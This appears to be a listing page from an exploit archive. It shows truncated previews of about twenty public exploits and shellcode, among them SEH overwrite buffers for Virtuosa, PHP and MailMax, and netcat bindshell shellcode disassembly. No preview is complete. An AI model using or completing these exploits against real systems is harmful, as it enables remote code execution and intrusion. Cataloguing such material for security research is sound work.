Virtuosa-Phoenix-Edition-5.2-ASX

Exploit Title: Virtuosa Phoenix Edition 5.2 ASX BOF SEH Overwrite Date found: Aug 16th 2010 Author: Acidgen Software Link: http://download1.virtuosa.com/VirtuosaTrial.exe Version: 5.2 junkA = '\x41' 1021 junkB = '\x42' 8979 nSEH = '\xeb\x06\xff\xff' SEH = '\x7e\xaa\x01\x10' nop = '\x90' 10...

PHP 5.4 (5.4.3) Code Execution (Win32)

No description provided by source. // Exploit Title: PHP 5.4 5.4.3 Code Execution 0day Win32 // Exploit author: 0in Maksymilian Motyl // Email: 0indotemailatgmail.com // Bug with Variant type parsing originally discovered by Condis // Tested on Windows XP SP3 fully patched Polish...

Linux x86 netcat bindshell port 8080 - 75 bytes

No description provided by source. / 08048060 start: 8048060: eb 2a jmp 804808c GotoCall 08048062 shellcode: 8048062: 5e pop %esi 8048063: 31 c0 xor %eax,%eax 8048065: 88 46 07 mov %al,0x7%esi 8048068: 88 46 0f mov %al,0xf%esi 804806b: 88 46 19 mov %al,0x19%esi 804806e: 89 76 1a mov %esi,0x1a%esi...

MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit

No description provided by source. / April 21.st 2006 myexploit.c MySql COMTABLEDUMP Memory Leak & MySql remote B0f MySql = 5.0.20 MySql COMTABLEDUMP Memory Leak MySql = 4.x.x copyright 2006 Stefano Di Paola stefano.dipaolaatwisec.it GPL 2.0 Disclaimer: In no event shall the author be liable for...

WinZip <= 10.0.7245 - FileView ActiveX Buffer Overflow Exploit (2)

No description provided by source. !-- prdelka http://blogs.23.nu/prdelka I made a version of my winzip exploit that utilises the heap spray method with a bindshell for some project or other. you can download a copy here if its of use to you, note i used a different method courtesy of...

bds/x86-bindshell on port 2525 shellcode - 167 bytes

No description provided by source. / ================================================== bds/x86-bindshell on port 2525 shellcode 167 bytes ================================================== / / -------------- bds/x86-bindshell on port 2525 167 bytes ------------------------- AUTHOR : beosroot OS ...

AOL Instant Messenger AIM "Away" Message Local Exploit

No description provided by source. / subject: local PoC exploit for AIM 5.5.3595 vendor: http://www.aim.com cve: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0636 credits: Matt Murphy date: 10 August 2004 notes: exploits localy if an argument is supplied, otherwise prints the url...

MailMax <= 4.6 - POP3 "USER" Remote Buffer Overflow Exploit (No Login Needed)

No description provided by source. !/usr/bin/python MailMax =v4.6 POP3 USER Remote Buffer Overflow Exploit No Login Needed Newer version's not tested, maybe vulnerable too A hard one this, the shellcode MUST be lowercase. Plus there are many opcode's that break the payload and opcodes that gets...

Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x

No description provided by source. !/usr/bin/python Exploit Title: Exploit for Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x Date: 29 dec 2009 Author: Emanuele 'emgent' Gentili and Emanuele 'crossbower' Acri Software Link: N/A Version: IIS 5.x/6.x Tested on: Windows 2003 Server SP...

Quick TFTP Pro 2.1 - Remote SEH Overflow Exploit (0day)

No description provided by source. !/usr/bin/python Quick TFTP Pro 2.1 SEH Overflow 0day Tested on Windows XP SP2. Coded by Mati Aharoni muts..at..offensive-security.com http://www.offensive-security.com/0day/quick-tftp-poc.py.txt bt quickftp.py Quick TFTP Pro 2.1 SEH Overflow 0day...

PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit

No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / // // ||||,||| ,|||||||,| || |||||| // // // // Proof of concept code from the Hardened-PHP...

MailEnable Professional 2.35 - Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl maildisable-v6.pl Mail Enable Professional =v2.35 win32 remote exploit by mu-b - Tue Dec 5 2006 - Tested on: Mail Enable Professional v2.35 win32 Note: timing is quite critical with this!!, so change $senddelay if it doesn't work.... use...

Quick Player 1.2 -Unicode BOF - bindshell

No description provided by source. !/usr/bin/python Quick Player v1.2 Unicode Buffer Overflow Found by : mrme great job by mrme! http://www.exploit-db.com/exploits/10797 Coded by : sinn3r x90.sinneratgmaild0tc0m thanks : corelanc0d3r's unicode article - awesome job! Tested on : Windows XP SP3 ENG...

GlFtpd 1.17.2 - Remote Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/891/info GlFtpd is a popular alternative to the mainstream unix ftp daemons and is currently in wide use on the internet. There are three known serious vulnerabilities in GlFtpd. The first problem is an account which is...

PHP <= 5.2.1 session_regenerate_id() Double Free Exploit

No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / // // ||||,||| ,|||||||,| || |||||| // // // // Proof of concept code from the Hardened-PHP...

EFTP 2.0.7 .337 Buffer Overflow Code Execution and Denial of Service Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/3330/info Encrypted FTP EFTP is both an FTP client and server application for Windows platforms. A malicious user with upload permissions to the target host can cause a buffer overflow in EFTP to execute code of the...

miniSQL (mSQL) 1.3 - Remote GID Root Exploit

No description provided by source. / /.------ /.------..---- / / \ /\ . // / . /\ / | / .\ . \ / / / \ | / | | slc | - -------||--.---.//-| //-.|----.|| / \ / / mSQL remote gid root exploit by lucipher & The Itch netric...

Mitsubishi MX ActiveX Component 3 - (ActUWzd.dll (WzTitle)) - Remote Exploit

No description provided by source. !-- Title: Mitsubishi MX Component v3 ActiveX 365+-Day ActUWzd.dll WzTitle By: DrIDE File: C:\MELSEC\Act\Control\ActUWzd.dll Version 1.0.0.1 Known Affected Systems: CitectScada 7.10r1 ships with this in the Extras folder. Known Affected Systems: CitectFacilities...

RealPlayer 10 ".smil" File Local Buffer Overflow Exploit

No description provided by source. / RealPlayer .smil file buffer overflow Coded by nolimit@CiSO & Buzzdee greets to COREiSO & news & flare & class101 & ESI & RVL & everyone else I forget This uses a seh overwrite method, which takes advantage of the SEH being placed in multiple locations over th...

PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit

No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / // // ||||,||| ,|||||||,| || |||||| // // // // Proof of concept code from the Hardened-PHP...